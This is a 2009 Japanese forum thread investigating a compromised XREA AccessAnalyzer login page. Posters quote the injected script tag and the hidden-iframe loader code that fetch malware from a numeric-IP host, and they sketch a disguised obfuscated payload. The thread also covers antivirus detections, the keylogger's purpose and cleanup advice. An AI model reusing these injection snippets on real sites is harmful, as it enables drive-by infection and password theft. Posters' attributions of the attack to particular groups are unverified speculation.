【アクセス解析】AccessAnalyzer.com Part5【XREA】
情報元
ttp://pc11.2ch.net/test/read.cgi/hosting/1246828727/ 511 :名無しさん@お腹いっぱい。:2009/07/08(水) 16:01:49 P
あ、関係ないかもしれないけど、
今XREAのアクセスアナライザー
ttp://ax.xrea.com/ のログイン画面で、アバスト反応した。
↓こんなんみたいだけど。
JS:CVE-2008-0015-A [Expl]
これって今回の騒動は関係ない?
514 :名無しさん@お腹いっぱい。:2009/07/08(水) 16:04:42 0
>>511 </head>タグのちょうどうえ
<SCRIPT LANGUAGE="JAVASCRIPT">
var js = document.createElement('script');
js.src ="http://1856317799:888/jp.js";
try {document.getElementsByTagName('head')[0].appendChild(js);}
catch(exp){}
js = null;
</SCRIPT>
</HEAD>
551 :名無しさん@お腹いっぱい。:2009/07/08(水) 16:24:48 0
>>539 ax.xrea.comは2台だな。
219.101.229.188 ←やられてる
219.101.229.189 ←やられてない
なにそれ、こわい。
>>559 マジでまずいんじゃね?
キーロガーを仕込まれてる可能性がある場合、
どういう対処をすればいい?
>>559 キーロガー自体は脆弱性をついてるわけじゃない
>>560 一番安心安全なのはOS入れなおし
その後クリーンな環境になってからWebサービスのパスワードを全部変更
メールアドレスや各種ログインするサイト全て
mixiみたいなとこもね
確かに違う、これはおかしい
>nslookup ax.xrea.com
Non-authoritative answer:
Name: ax.xrea.com
Address: 219.101.229.189
Name: ax.xrea.com
Address: 219.101.229.188
>wget -qO-
http://219.101.229.189/login.php | md5; echo
219.101.229.189
b3782c67d6af86b38b06464f6ac9c10c ★これと
>wget -qO-
http://219.101.229.188/login.php | md5; echo
219.101.229.188
55d334703972573546362e8734be34f9 ★これが合わない
改ざん?されたらしいほうのところを調査
gifトロイやらなんやら一杯はいってるね。自己解凍cabが偽装されてたりするし
でも大体は最新にアップデートしてればおkかな
でも、一番の問題は、これかな
http://1856317799:888/dir2/go.jpg
一見拡張子からjpgファイルっぽいけど、
> more go.jpg
var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e
以下長いので略
まぁ、スクリプトが偽装してある、これがまだ回避策のみでパッチがででてない虚弱性
972890
http://www.microsoft.com/japan/technet/security/advisory/972890.mspx なのかな
のーとん先生が反応してくれたので急いでここにきた・・・ くそー、なんなんだお・・・\(^o^)/
一体どうしたというんだよ・・・ 笑えるわ
vistaなら大丈夫なんだろ
Windows Vista または Windows Server 2008 を使用しているお客様については、 Internet Explorer でこのコントロールにデータを渡す機能が制限されているため、 この脆弱性の影響を受けません。 だってよ XP\(^o^)/ オワタ
じわじわと何やられてんのかなーと調べ中。どうみてもあやしいjp.jsの中身を見てみる
>>563 もそうだけど、大丈夫かは明確じゃないんでwindowsでは調べるのやらないほうがいいと思います。
とりあえず俺はFreeBSDなんでそれでやってます
>more jp.js
/*dsadasdadasdasdasdas*/
if(document.cookie.indexOf("J=")==-1)
{
var js = document.createElement('iframe');
js.src ="http:¥/¥/0x6EA52967:888/dir2/show.php";
width=0; height=0;
try {document.getElementsByTagName('head')[0].appendChild(js);}
以下略
なんか差し込まれてるね
とはいえ、show.phpはさすがに何も吐いてこない、うーむ。さらに後ろを見てみる
var fr = document.createElement('iframe');
fr.src ="http:¥/¥/1856317799:888\/counter.htm";
width=0;
height=0;
try {document.getElementsByTagName('head')[0].appendChild(fr);}
なんか呼ばれてるcounter.htmをみてみる
<!-- shinobi ct2 -->
<script type="text/javascript" src="http://ct2.shinobi.jp/sc/1298877"></script>
<noscript><a href="
http://ct2.shinobi.jp/gg/1298877 " target="_blank"><img src="
http://ct2.shinobi.jp/ll/1298877 "
border="0" alt="<A5><AB><A5><A6><A5><F3><A5><BF><A9>`"></a></noscript>
<!-- /shinobi ct2 -->
ん? 忍者ツールだと……。
もうちょっと調べてみるかな。なにやってんだろうね
あ、
>>568 で一部全角にしわすれた。不明瞭なリンクはクリックしないほうがいいと思います
ノートンがブロックしてくれてればセフセフ?
avast入れてアクセスしてみたけど反応ない。 引っかかってるのかなぁ・・・
MSはまだ正式対応してないけどパッチか何か公式で配布してたよね?
いろいろしらべていくと、あぁなるほど で、 <script src='go.jpg'></script> で、問題のjpgをスクリプトとして読み込ませてますね 他の関係なさそうなファイル見てみると if(user.indexOf("msie 6")==-1&user.indexOf("msie 7")==-1) ともあるので、 これも同じように、IE6とIE7の狙い撃ちかな? わざわざ律儀ですね でも、whoisとかで調べていくと、 hellh.netということで、 おそらく、本体は、各種ネトゲのアカウントハックってところでしょうかね ネトゲやってないと問題ない、なんて思っても、 この手のウイルスはレジストラに残るとネットワーク重くしたりといろいろうざいんで、 対応したほうがいいですね とりあえず俺は大体わかったんで、ここまで
ノートンが遮断しましたって反応出て、 そのままログインしちゃったけど・・ 平気なのかな?
遮断した上で「このコンピュータは安全です」って表示されてるから大丈夫なんだろ
心配なのはわかるが他人はなんとも言えんよ、責任とれないんだから
各主要セキュリティーソフトは既に対応済みなんだろか
WinXP+IE6,7の人は死亡ってことか
うぇ、マジか WinXP+IE7だわ・・・ バスター反応しなかったけど対応できてないのかな
調査ついでに、FreeBSDからWindowsに移って各種ウイルスソフトの対応状況も確認してみたよ とりあえず試験用に5台あるので、そっちでチェック ノートン、カスペルスキー、avast、nod32はgo.jpgに反応した。なかなか優秀ですね ウイルスバスターは反応なし。残念ですね でも、このjpg自体が本体ではなく、それを利用してくる、別のウイルス本体のexeがあるので、 そっちに反応してればおkですね。これは未確認だけども
>>582 乙です。
結局はマイクロソフトの修正プログラム待ちしかないのかなー
>>568 推測なんで確信はないんだけど、
忍者ツールのscriptは リファラーを拾って
どこのサイトのパスを抜けたか調べるためにあるんじゃないかな?
忍者アクセス解析でリファラーとリモホを取得して、ロガーから送信されてくるパスワードとリモホを照合する
そしてリファラーのサイトでパスワードを入力すればログイン成功!
全然違ったら惑わせてごめん、誰か突っ込みよろしく
go.jpgは今でも確認できる? 確認できるうちに各ニュースサイトに片っ端から教えてあげようと思うんだが
あれ >ユーザが Internet Explorer でそのサイトを閲覧した場合 てことは、lunascape5使ってる自分はセフセフ?
>>586 lunascapeもSleipnirもデフォレンダリングエンジンはIEですよ
>>587 そうなんだ・・・サンクスです
バスターてめーとは今日限りだ
こういうときはvistaが輝くんだなw
フラッシュプレイヤーやアドビリーダーが古いバージョンだと、 IE以外でもアウト?
>>572 自分もプニルでavast入れてるんだが、反応しなかった…
IE以外ならActiveX動かないんじゃない?
FireFoxセーフ? でもavastが反応しないのもなんだか納得いかない。
プニルのIEエンジンってIE7だっけ?
>>595 持ってるIEのバージョンによりけりですよ
>>595 インストールされているIEのバージョンじゃないか?
IE8を入れていればプニルでもIE8のエンジンが使われるかと
暇なので、さらにチェク
無防備なWinXPを生けにえにささげ、exeをげと
んー、やっぱ普通にキーロガーですね。でもどこまで反応するかなー。特定アプリ(ネトゲ)にのみのターゲットかも
ネトゲまではいれてないしなー
とりあえず、本体までくるとどのセキュリティソフトでもNGっていってくるんで、
なにかセキュリティソフト入ってれば大丈夫でしょう。とりあえずはね
それに、ここの系列のウイルスはよくよく調べたら俺も対応したことあるかなり有名どころですね。俺、セキュリティ関連の仕事とかしてるもんで
これうざいんですよ。でもうざいだけですね。実害は……、人によるかな。まぁ、不安定にはなるからあえて感染するのはお断りしたいですね
>>584 ふむふむ・・・なるほど。んーでもそこまでやってはいなそう。たぶんね
>>585 これは酷い! っていうほどのタイプじゃないんで、
あまり話題にはならないかも。これはよく見かけますし
以上。たぶんね。あくまで今調べてみて、かつ俺の知ってる範囲でのことだからね、2ちゃんねるの情報だから無条件でうのみにしちゃだめだよっ☆
本当かよ…とか、そういう疑問あるなら、自分でしらべてみてね。違うかもしれないから
そうなのか IE8を入れたのに俺のプニルが吐くUAはこれ↓なんだよな Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Sleipnir/2.8.5)
>>598 では、セキュリティソフト入ってれば大丈夫ってかいたけど、
これはあくまで、これだけ限定の話なので、
ちゃんと972890で穴ふさいでくだしあ
穴は見つけたらとじておきませう
IE以外でも、アクロバットリーダーやフラッシュプレイヤーが古いと まずいんだよね?
今のところ、そのウイルスに感染してるかどうか確認する方法はあるかい?
>>574 追記
if(user.indexOf("ns 5")==-1)
ともあるようなので、OSはWindows 2000とXPターゲットですかね
まぁ、告知通りですね
一応、それだけ
>>603 そっちも混ざってますね。最新版にしないとだめです。でも、こっちはもう既知の問題なんで対応ずみかな
swfもあったので、しかし、いろんなものまざってますねー
しかしここはトロイの木馬軍団って感じですね、よりどりみどり。まぁ、1匹でもヒットすりゃいいので、数打てばどの馬かが当たるかもしれませんしねー
>>606 気合いで。まぁ、regeditちゃんと使える人ならわかりますが、あまりおおっぴらにはでてこないですね
この手のは特定のファイル名とは思えないんで、どうせランダムでしょう、特定ファイル名を書いて、それないから安心! みたいなことなると困るので
ファイル名はあえてかかないですー。でも、レジストリは増えるんで差分みてください
なんかだらだらと居座っちゃったけど、いつもの板に帰ります
608 :
606 :2009/07/08(水) 20:28:05 ID:???
>>607 なるほど、素人目にゃ難しそうだな
お疲れ様です
色々ありがとう!
エクセリアのログインから入って、うちのノートンでは 「Trojan.Maliframe!html」というトロイの木馬を検出した。 反応するのはやっぱりjp.jsとかいうスクリプトに対してだ。 これIE等のブラウザを悪用して有害サイトへリダイレクトする可能性がある、 有害ソースを含んだ HTML ファイルに対する汎用検出名だとさ。 つまりなんのセキュリティ対策もしていないと そのまま危ないサイトへ勝手に接続させられて被害が出る可能性があるってことらしい ネット回ってみると、同じアク解使ってる人がエクセリアに問い合わせしたらしい。 旧OSとか使ってる奴いたらGENOウィルスの二の舞だよなコレ。 しばらくは危険そうだしここのアク解は使わないどくわ。
>レジストリは増えるんで差分みてください そんなこと書かれても、どうすればいいかわかんね。
よくわからんのだけれども サイトの解析、はずしといた方がいいのかなぁ
ログインページで感染なんだから外そうが付けようが関係ない
>>611 バナー踏んだら案内つか解析の入り口には簡単に飛べるよね。
そこが感染した鯖だったら危険かもしれないってことは事実。
そう易々と感染するものだとは考えたくないが、
二次被害防止の意味で、念のためとか万が一を考えるなら、
おさまるまで外す(アクアナに飛ばないようにする)のがベターかもな
つか、自分は今からそうする。使い勝手がいいから残念だけどさ。
100パー無事ですと解決するまで違う解析に乗り換えるよ。
去年の広告みたいに、バナーを表示するだけで感染 なんて風に改ざんされる可能性はない? ユーザーだけが被害に会うならまだいいが、 閲覧者にまで被害が及ぶと問題は更に深刻。
>>611 感染の危険があるのは解析使ってる人だよ
ログインする時が危ないみたい
うちのノートン先生もgo.jpgをブロックした
今のところ、ネトゲにログインする時に
入力するIDとパスを盗みとられる可能性があるらしい
キー入力を監視するキーロガーっていうヤツ
俺は外した
使い勝手がいいのはココだけど
さすがに身の危険を感じてまで使いたくないw
検証してくれた人ありがとー
アクセスしてくれた人に害がなくてよかった
617 :
613 :2009/07/08(水) 20:40:24 ID:???
この騒ぎを知らない人も多いはずだから、 新規登録してログインする危険性を考えたらの話だ…勢いでスマソ
>>615 うちもノートン先生が反応してかなりびっくりした
ひとまずニュースサイトとかに書いたりタレ込んだりするなら アクアナのログイン画面からトロイの木馬 Trojan.Maliframe!html(ノートンでの検出名)が検出され 画像ファイルgo.jpgが検出されるけど、これは媒介元で本体ではないこと ウィンドウズの2000やXPなど旧OSや旧バージョンのブラウザ(特にIE)を使い続けている人や セキュリティやプラグインのアップデートを怠っている人は感染の可能性が高い これはネットゲーム系へのIDやパスを盗むキーロガーでもあり 外部のウィルスサイトや攻撃サイトへリダイレクトされる可能性もあるということ エクセリアつかアクアナの鯖全部が感染してした訳ではない様子だが 公式からの見解やコールも今だ不透明で このアクアナをよく使っている人は要注意 対処としてはアクアナを自分のサイトから外して使わないこと 自他共にアクアナの関連サイトに飛ばないようにするのが最も安全ということだね 追記あったら誰かヨロ
対策としてはGENOウィルスとほぼ同じみたいだ フラッシュだのリーダーだのプラグインも最新版にしないと危険か
GENOもトロイの木馬だからね
調べたけど、これ、トロイ→ウイルス本体の二段構成だね まず、こちらのPCに穴がないか、さまざまなトロイがいくつも試される そのなかにはGENOと同じ虚弱性をついたものも混ざっている。でも、これはGENOのときにすでに対策されている だから、最低限、Adobeの更新は必要。 でも今回は、最近みつかった虚弱性をついているトロイがある。これはちゃんと対応していないと処理しきれない そういうことだろう go.jpgそのものがウイルス実行ファイルってわけではないが、穴を探しにくるのは気持ちのいいものではないな
バスターで反応 ウイルスが見つかりました。 隔離不能、手動での処理が必要です。 JS_DLOADER.BD vistaでIE8なんだけどほっといても大丈夫なの?
これ自力で感染を確認する方法はまだわかってない?
>>624 VISTAでもセキュリティホール放置とかアップデートしてないのはまずい
デフォにあるUACを切ってる人も要注意だね
IE8も7や6より安全ではあるけどセキュリティーの堅さは未知数
ログインした後の画面だけじゃなくて、
アクセスアナライザーでヤフるかググって出る公式トップ(案内ページ)でも
ノートン先生が盛んにトロイ検出するようだ←今もう一回飛んでみた
検索結果では今のところ過去のキャッシュもあるせいか青信号表示だけど
リンク踏んでアクアナに飛ぶと速攻で警告が出る
公式は対策を急がないとエクセリアのレンサバに影響するかもしれないな
危機感を煽る気はないけど、
アクアナ公式がトロイの木馬とウィルス感染してんのは間違いないと見てよさそうだ
自分のパソコンに感染するだけでなくGENO同様に二次被害を考えたら
この解析自体を外して飛ばない&飛ばせない方が最も安全てことは確かだな
ネットの一時ファイルやキャッシュも 落ちた毎にクリーンにした方がよさそうだな
久々に伸びてると思ったらウイルスかよwww とどめだな
脆弱性つかセキュリティホール突くとなると ひとまずセキュリティ面はGENO対策と同じとみていいな ノートン先生がシマンテックに今回のトロイ警告情報を送ったようですw また感染源の公式よりセキュリティメーカーが先に動くのかね〜
大事な事だからあげようぜ
632 :
Name_Not_Found :2009/07/08(水) 23:09:37 ID:1R2gZLOe
あげ
ホーム・登録・ルール・ログイン・FAQ・サポート・ログアウト だけ見たけど 全部に仕込まれてるな
相変わらず219.101.229.188のサーバにのみ存在つか ログイン後の画面だけじゃなくなったということは 188側は鯖ごと全感染を疑っていいんじゃないのか? ひとまず飛ぶな。アクアナ解析外しとけ。 それしか言えんな。せっかく使いやすいアク解だったのに.....
やっぱネトゲのアカハックウイルスっぽいね ラグナロクオンライン・ファイナルファンタジー・マビノギあたりから被害報告でてるし ネトゲやってないなら直接的な影響は確かにないかも でも、関係なくても気分はよくないな
>>635 来てたか
0day攻撃て....アクアナだけじゃなかったのかよ
wikiwiki.jpとVALUE DOMAINご愁傷様つか
対策の見解が今だに無いのがイタイな
GENOとは似て違うタイプみたいだね
どっちにしても今すぐアクアナのタグ外すわ。感染怖えし
完全に外しちゃったほうがいいのかな? コードを display:none; で非表示にするだけじゃまずい? あ、それやったら規約違反になるのか…
>>638 それは表示されなくなるだけでデータのロード/スクリプト実行はされるので
違反以前に意味ないかと
有料で非表示だけどなんか怖くて タグとりあえず消しちゃったお!(;^ω^)すっきり! あと2ヶ月分も金払ってあるのに、全くここは・・・はぁ・・・ いつかはなんとかなる・・のか?
>>638 二次被害考えたら外した方がいいかもな
アクアナのタグ見ただけでブラウザバックとか無駄に警戒するとか
事情知ってドン引く閲覧者も出そうだし
ニュースになって情報が広まっているのに公式からの対策情報もないし
使ってたら自分のサイトの印象まで落ちるものにまでなってくのも事実だな
IDまで全消しにする必要はないだろうけど
ほとぼり冷めるまで他のアク解に乗り換えた方がいいかもな
VALUE DOMAIN全域となるとカウンタとかも感染してんのか気になるな
全域つか8割以上は感染か全滅とみておk?
ノートン先生、>620のトロイだけじゃなくて Downloader.Fostremとかいうのも遮断してるぞコレ 反応するファイルはgo{1}.jpgで同じだけど。 >623の言うとおり、いろんなウィルスをけしかけて来るみたいだ VALUE DOMAINやエクセリア自体にアクセスしないに限るな。 自分も有料版のバナー無しだけどスクリプト動くんじゃ同じだから消した。 今までのログ勿体ないけど感染するよりマシだから しばらくの間ログインも削除もしないで、どこか別のアク解でも借りるよ。 いざ外してみると後味の悪い安心感が何ともははやw
643 :
638 :2009/07/08(水) 23:56:43 ID:???
>>639 >>641 そっか。アクアナに飛べなくなればいいってわけじゃないんだね。
アドバイスありがとう。外してすっきりします!
あれ?うぃるすこーどきえてね?
鯖2台あるうちの1台219.101.229.189側は感染してないだけ。 そっちからソース見れば感染してないのは明らかだよ。 まだ安心は出来ないな。
ブラウザでみるとあぶないから、コマンドでソースおってるけど、何も状況はかわってないね
感染していたらクリーンインスコしか無さ気だな.....orz 公式が安全宣言するまでは外して、閲覧しないどくわ
ノートンとかカスペの駆除じゃダメなの?
いい機会なのでQLOOKへ移ります
そか、数字のURL俺の側からみたらきえてたんで直ったおもたけどまだ安心はできないな。
>642も書いてるけど仕掛けられてくるトロイ攻撃が複数ある上に GENO同様に亜種もありそうだがどこのセキュアメーカーも抑えてない 不安はあるけど、駆除できるものは駆除しといたほうがいいし 見ないものは見ない、外せるものは外すしかないかもな
>>574 みたいにウイルスの仕組みまで追っかけれるような人以外はあまり手をださないほうがいいのかな、これ
jpgってこういう偽装できるんだな……、何書いてあるかさっぱりわかんねぇ
IE8なのにgo.jpg拾った俺ってなんなの?
>>652 636のように警告や報告のあるネトゲは多いから
不安があるならそのゲームの公式サイトにでも問い合わせてみるべし
ネトゲユーザーはここで聞くより自分でメーカーに聞いとけ
とりあえず解析タグすべて外しておいた。 昨日あたりからフリー版のAntniVirがgo.jpgに反応していたのはこれだったようだ。
バスターはまだ未対応なんだよね? 早くMS公式対応してくれよ…
これって、どうやったらウイルスだってこととかターゲットとかがこの情報で解析できるの?
>>563 の人とかアンチウイルスソフト使ってないみたいだし
深い意味はないけど、今後の勉強ってことで……
>>653 ですよねー
私は無料版だけどタグ全部外したよ。
ID抹消は後回しにできるし忍者でもFC2でも他の探すわ。
GENOの時の同人サイト界隈の騒ぎ方は異常だったし
うちが感染源サイトとかレッテル貼りもされたくないからね。
ネットのキャッシュもローカルからは削除するようにして
しばらくネトゲのログインも自重しとくわ。
俺はアホーアクセス解析に完全移行しますわ
生粋のXREAユーザーの俺だが困った困った バリュドメ、XREA+、アク解とXREAにお世話になりっぱなしだったぜ 5年間つかったアク解はずさせてもらったよ。もっとセキュリティ面対策してよね
公式は何やってるんだろう? アクアナだけじゃなくてカウンタとか使ってるから凄く気になる 今からアクアナは外すけど アクセスカウンタも最近異常に落ちるんだよね 2chだけなら疑うわれるだろうけど 635みたいに外でニュースにまでなってるんだよね 有料鯖使いはそろそろご立腹かもしれないよ
>>661 セキュリティー面以前にここのスタッフ共の動きが悪すぎる
こんな時に連絡も取れないし公式アナウンスも無しのだんまりなのが腹立つ
せめて感染わかってる鯖だけでも感染という理由付けて 強制的に落としちゃえばいいのに なまじアクセスできるようになったままだから二次災害になるんだよ
正直、大々的にアナウンスしないと全く知らないユーザーが大多数だと思う 対応がやばいよな、ここ
>>662 最近異常に落ちるって、カウンター鯖なんかは5月末からのVDネームサーバ障害の問題で
ほぼ常時氏にっ放しでしょ?
現時点でもネームサーバは氏にっぱなしだし。
設置してるなら解かってる筈だけど?
>>663 24時間働けとは言わないけれど、7月7日の9時ごろから改ざんされているんだから、
1日たってもまだおかしいっていうのは企業としてちょっとアレだよね
多分韓国とかそこらへんからクラックされてるんだから、韓国と中国のIP全部はじけば良いのにな
このご時世でこの対応は無いわw 終わったな
>>658 go.jpgを手に入れたらあとはそれを間違って実行しないようにファイル名をかえてから、
テキストファイルで開いてみるんだ
ね、書いてあるだろ?
670 :
662 :2009/07/09(木) 00:39:34 ID:???
>>666 ちょい誤解あったみたいでスマソ。
ネーム鯖の氏にっぷりがコールされてんの知ってる。
鯖は違ってもVALUE DOMAIN管轄だしアクアナのバナーと同じように
リンクが表示され続けることで感染になるか気になっただけ
GENOの時も対策大変だったんでビビりすぎ自重なのは自覚してます
>>669 今の僕には理解できない
ホームページでちょっと適当にjavascriptを使う程度の俺には、レベルが高すぎてついていけない
一体これは何が書いてあるんだ……、勉強しようっと……
>>658 1856317799の時点でおかしいのに気づいたら
2進数変換して8オクテット区切りのIPv4アドレスに直して
whoisしてごらん。胡散臭いことが分かる。
ていうかまだ改竄されたままなの? なんでそれくらいすぐ修正できないんだろ? 乗っ取られてる?
ブラウザで確認するのいやだからコマンドでソースだけ引っ張ってきて確認するかぎり、あいかわらず同じだね 全く変わっていない
どういう被害があるの?
ネトゲのパスが奪われます。 ちょっと回線が重くなります。 以上
でもこれプロセスにはずっと残るよね 当然だけど感染したら自分のPCも感染源になるのかな
しかし対応が相変わらずの糞だなここは…
とりあえず大体はずしてきたがあちこち張って有るからはずすの大変だ……
680 :
緊急事態 :2009/07/09(木) 01:08:15 ID:???
爆発したorz
681 :
Name_Not_Found :2009/07/09(木) 01:10:45 ID:fzZJHULr
!?
いま、トップページにアクセスしたら、ESS がトロイを検出しました。
それで驚いてこのスレにきました。
でも、
>>682 によると、ESS(NOD32)では対応できないウイルスなのかな?
とりあえずログを読むべきだと思う。現時点での答えが全部書いてある
go.jpgはただのスクリプトだからそれ消しても意味ないぞ。 exeが発動したかしないかに関わらず用済みなので。
ログを読んでないか、理解できてない奴が多いようだ せっかく検証されているのに
ネトゲアカハック系はネトゲだけじゃない可能性もあります ログインするWebサービス全般(ブログ、フリーメールなど)が危ないと考えたほうが良いです HTTPSでもキーストロークや画面のキャプチャが取られていたら危ない 感染してもネトゲやってないからいいやっていうのは考えないほうがいいです さすがにこのスレにはそんな人以内と思うけど念のため
ウィルスの活動内容聞く奴が多いけど、内容の完全な把握はアンチウィルスベンダ所属の本職でも難しいって事を知っておけ。 GENOの流れを引いてる可能性が濃厚なので、何らかのFTPなどの通信手段を使ってる人は二次感染元になると思うべき。 FTPもネトゲも縁が無いって奴にしても、ボットネットに組み込まれてしまう可能性が高いので、何をされるか分ったものじゃない。
スレ違いも同然なんだが…GENOというか、これってFF11のRMT摘発事件から続く一連の中国RMT業者集団による波状攻撃なんだから GENOどころか全ての国内事例が繋がっていると考えるべき。 現に今回のもXREAの時もGENOの件も、MMO界でRMT業者として知られていた中国人(または国としての中国)が関わっている。 それに、GENOも今回のも、最終的にはアカウントハックのためにMMOのパスを抜くことに帰結しているのもその証左。 山田ウィルスなんて、ここまで大規模なことは(少なくとも鯖を丸ごとcrackするリスクを負ってMMOのパスを抜こうとするなんてことは)なかっただろう? (ちなみに、対象となっているゲーム(特に中国では最大規模のMMO「Lineage2」)でのこの手のアカウントハック事例は数多いし、 ハックされたアカウントが持つゲーム的に有価である物品が根こそぎ奪われている報告も数多い。)
訂正。国としての中国、というのは.cnドメイン全体としての(少なくとも.cnドメインレベルでの罠サイトやウィルス置き場は数多い)中国、ということだ。 もちろん、鯖をcrackできる程度にやる気がありリスクを犯した業者連中が、単なるキーロガーのDropだけで済ませないことも十分考えられる。 即ち、「MMOを対象としたキーロガーだけなら、まいっか」程度に思っている人間がサイトを運営したりアクセス解析に手を出すべきではない。
俺も爆発した!!!!
694 :
Name_Not_Found :2009/07/09(木) 04:56:00 ID:sOzTKIRE
こんなことでスレが活性化するとはおもってなかったぜ
問題が起こればスレが噴くのは当たり前
おい・・・ マジで爆発したぞ・・・ シャレにならん・・・
使うのやめろよ
>exeが発動したかしないかに関わらず用済みなので。 これはどこを見ればわかるの?
>>699 自己主張するタイプのウイルスじゃない、
むしろ存在を隠蔽するタイプ。
「だめかも?」と思ったらとっととリカバリ。
もちろんそのまま使うのもあなたの自由。
flashaegh.dll、diskcheck.exe、a.exe これらがシステムドライブにあれば発症してるかも。 あと数分置きにns1.china.com、www.fccja.meibu.com などに繋ごうとする。 バスター見事に無反応だった…orz
これかかったら激重になったりするのか
まだ放置しているw さすがXREA
重いっつーかウィンドウ開くのがいつもより少し遅れる感じ。
だいたいだけど今までのログ総括すると ・ウィンドウズ2000かXPといった旧OS、IEの旧Var、セキュリティ対策ナシだと感染する可能性大 ・バスターだと検知しないトロイがあるようだ ・アクアナをはじめとするバリュドメのユーザーなら全てにおいて警戒が必要なレベルに至っている 警戒=撤退。アクアナのスクリプトなども外す方が二次感染を防げる ・例えばアクアナのログイン画面でなく、ただのトップページ(ホーム)でも検出される ソースに異様なJavaスクリプトが組み込まれているので、閲覧しただけで感染するタイプ しかも複数のトロイを仕掛けてユーザーのセキュリティホールや脆弱性を探してそこを突いてくる ・感染するとPCの動作が重くなる(媒介元になりうることがある かかったトロイの種類によっては悪意のあるサイト(中国ドメイン)にリダイレクトして 感染をさらに深刻化する可能性もある ・キーロガーであることは分かっているのでMMO(ネトゲ)のIDやパスが抜かれることがある ・FTPのパスや何らかの形で使用しているIDやパスも抜かれる可能性は否めない 感染予防 ・バリュドメ、アクアナのサイト全てにおいてリンクを踏まない ・アクアナなどの解析スクリプトはすべて外す(二次被害防止にもなる ・OS、ブラウザ、プラグインなどを最新版にする ・セキュリティソフトも最新版に対応する(現にカスペルやノートンは反応して防いでくれている ・VISTAの場合はユーザーアカウント制御をオン(デフォではオンになってる)にして意味不明なプログラムは実行させない ・ルナスケやプニル、2chビューアの一部などIEをベースにしてるブラウザも警戒がいる ・感染が疑わしくばネット切断の上でクリーンインスコ(リカバリ)推奨 過去ログ読め
>このWebサイトはアドオンをインストールしようとしています。 >インストールするには、ここをクリックしてください。 と、表示されるのですが、クリックしなければ感染しませんか。 あと、ソースネクストのウィルスセキュリティ0で対応できますか。 教えてちゃんでスマソorz
火狐で踏んでみたけどノートン先生寝たまんま
avastは反応した
>>708 え、自分とこのavastは無反応なんだが
>>705 ・古いアドビリーダー・フラッシュプレイヤーを使っていると感染する
ってのも追加した方がいい。
OSやIEのバージョンの話はよく持ち上がって、vistaだから大丈夫とか
判断して安心してる人が多いような気がする。
火狐とか他のブラウザの場合は ブラウザのビューの段階でブロックできててノートン先生が発動しないのか すでに感染していて入り込まれていて、リアルタイムな警告が出ないだけなのか 他ブラウザの人は最新版のスキャンでシステム全部をスキャンした方がいいよ。 ちなみに自分の場合はXP、ネットは>707と同じ火狐とノートン先生。 アクアナのホームは反応無しで、ログアウト後にスキャンしたらトロイ検出→駆除した 普段から怪しいサイトは見ないから感染源はアクアナ以外考えられないんだよね 隠蔽タイプって過去ログにあったけど見えないところで隙を突かれるぽい...orz もう隠し通せないのは事実なんだから バリュドメは本気と誠意で対応してほしい
トロイが進化した以外は、ウイルスの場所もパターンも去年と同じなんだよなぁ またやられたってことは、何も対策されていないってことか
火狐のNoScriptアドオンで例の数字羅列のURLのスクリプトを遮断してる場合は感染しないと思ってよし?
とりあえずvistaは大丈夫なのね。
715 :
Name_Not_Found :2009/07/09(木) 11:20:48 ID:1Vfj/VSA
>>713 自分もまったく同じ
火狐でノートン無反応、
NoScriptが数字の羅列弾いてる
自分は プニル(IE8)VISTAでノートン無反応
ネームサーバ今日は完全に死んでるね
事務所はとっくの昔に空っぽでサーバだけ動いてる状態だったりしてな でごく稀に担当者がのぞきに来るとか
過去ログを読んでもわからない点があるんだけど、 サイト閲覧時にセキュリティソフトがトロイ検出→駆除した場合にも、 ウイルスに感染しているおそれはあるのかな。 無知で申し訳ない。
誰かまとめサイトとか作ってくれないかな。
もうやだここのサービス
>>719 ログにあるように、トロイ(複数)→ウイルスの順番です。
なんらかのトロイが通ることにより、こちらのPCの制御にまで影響しローカルにウイルスが落ちてきます
トロイをすべて防げればまずは大丈夫でしょう。ただしすべてのトロイを検知した場合に限る
>>722 ありがとう。
トロイはウイルスを送るためのトンネルみたいなものか。
そして、トップやログイン画面には複数のトロイが仕掛けられているため、
トロイを検知してもすべてを検知したとは限らないので、安心はできないということですね。
>>722 改竄があったことが知れ渡った後も、
「オレは大丈夫」と思わせるために、
簡単に検知されるトロイをわざと仕込んでおくってこともあるのかな?
サポから担当部門に連絡してくれたそうだ。(多分テンプレ) 数日以内には対応してくれるだろう。
アナウンスは…無し? ですよねー
しないよね
何事にも動じません
発表は無いワロタ
733 :
726 :2009/07/09(木) 17:47:30 ID:???
おっと追伸〜 VDのログインページの改ざんはないと言ってたよ。 今回もアナウンスはないだろうね。
自分の周りはこのアクセス解析だらけだ うちはなんか面倒になった外しちゃってたけど、正解だったな…
サイト閉鎖して正解だと思ったよ
この解析タグ入れてあるウェブサイトを閲覧したPCには害はないんでしょうか?
>>737 これ使ってなくてどんなタグだか知らないのでサンプル頼む。
>>737 今のところは問題ないと思いますよ。
バナーをクリックするのはまずいので、
バナーを表示してるサイトの管理人は、
一時的にでも削除した方がいい。
何事にも動じないアクアナさんかっけーっす!!!!!
>>738 アクアナに登録してログインすると、
タグを見ることができる。
>>729 >・2009年7月08日(水) 外部サーバのホスティング業者のログインページが改竄されているとの情報を入手したが、発表はない
VALUEDOMAINかXREAのことですよねー
天狗の仕業だよね
天狗の正体ってって、外人さん?
これさ、何も知らずに利用し続けてる人はやばくないか 自分はたまたまブログ板で見かけたから知ったようなもんだし
747 :
Name_Not_Found :2009/07/09(木) 19:22:31 ID:+WiaDvcs
レン鯖板だった。誤字スマソ
知らないでアク解ログインしてたよ nod32使いだが何の反応もしなかった ウイルススキャンかけてみたけど何も見つからない genoのときに一通り対策はしてたが どうすれば感染の有無が確認できるのかすらわからん
知らないでログインしようとして ブラウザが落ちた。 感染したのか・・・ 腹立つ。
放置するのが xreaクオリティ
>>747 また捏造だろって流れになってるな
あいつら訓練されすぎだろ
>>747 そのスレ、読んだけどなんか酷いね。検証結果は信じられないとか、意味がわからない……
>>747 のスレまとめ
検証したよ!
↓
こんなのは解析とは言わん。検証結果は信じられない
↓
それなら自分で調べろ
↓
ツッこまれたら自分で調べろの逃げ口上はやめるべき
以下、無限ループ。酷いスレだな
理解できない
工作だけは一丁前だからなあ
これは怒ってもいいレベル
